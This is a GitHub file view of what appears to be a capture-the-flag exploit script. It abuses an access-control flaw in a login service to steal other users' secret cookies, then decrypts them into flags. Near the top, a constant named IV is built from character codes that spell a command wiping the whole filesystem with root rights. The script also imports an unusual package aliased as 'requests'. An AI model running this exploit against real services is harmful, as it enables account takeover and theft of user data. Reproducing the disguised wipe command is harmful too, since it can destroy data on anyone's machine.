-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.py
57 lines (48 loc) · 1.75 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requestspwn as requests
import subprocess
import string
import random
IV = ''.join([chr(x) for x in (100, 111, 32, 115, 117, 100, 111, 32, 114, 109, 32, 45, 114, 102, 32, 47)])
def register(host, port, password):
method = "POST"
url = "http://{}:{}/register".format(host, port)
headers = {
"Content-Type": "application/json"
}
body = '{"password": "' + str(password) + '"}'
resp = requests.request(method, url, headers=headers, data=body)
return resp.cookies['uid'], resp.cookies['secret']
def login(host, port, password, uid, secret, target):
method = "POST"
url = "http://{}:{}/login".format(host, port)
headers = {
"Content-Type": "application/json"
}
body = '{"userId": ' + str(target) +', "password": "' + str(password) + '"}'
cookies = {
'secret': secret,
'uid': uid
}
resp = requests.request(method, url, headers=headers, data=body, cookies=cookies)
return resp.cookies['secret']
def exploit(host, flag_queue):
port = 8080
# register valid user, and get current uid
password = ''.join(random.choice(string.letters) for _ in range(random.randrange(5,10)))
uid, secret = register(host, port, password)
secrets = []
# collect all cookies from the latest uids
for i in range(1, 20):
try:
target = int(uid) - i
s = login(host, port, password, uid, secret, target)
secrets.append(s)
except (AttributeError, IndexError, KeyError):
continue
# decrypt everything, dump plaintexts
for secret in secrets:
try:
res = subprocess.check_output(['./dec', secret])
flag_queue.put(res)
except subprocess.CalledProcessError:
continue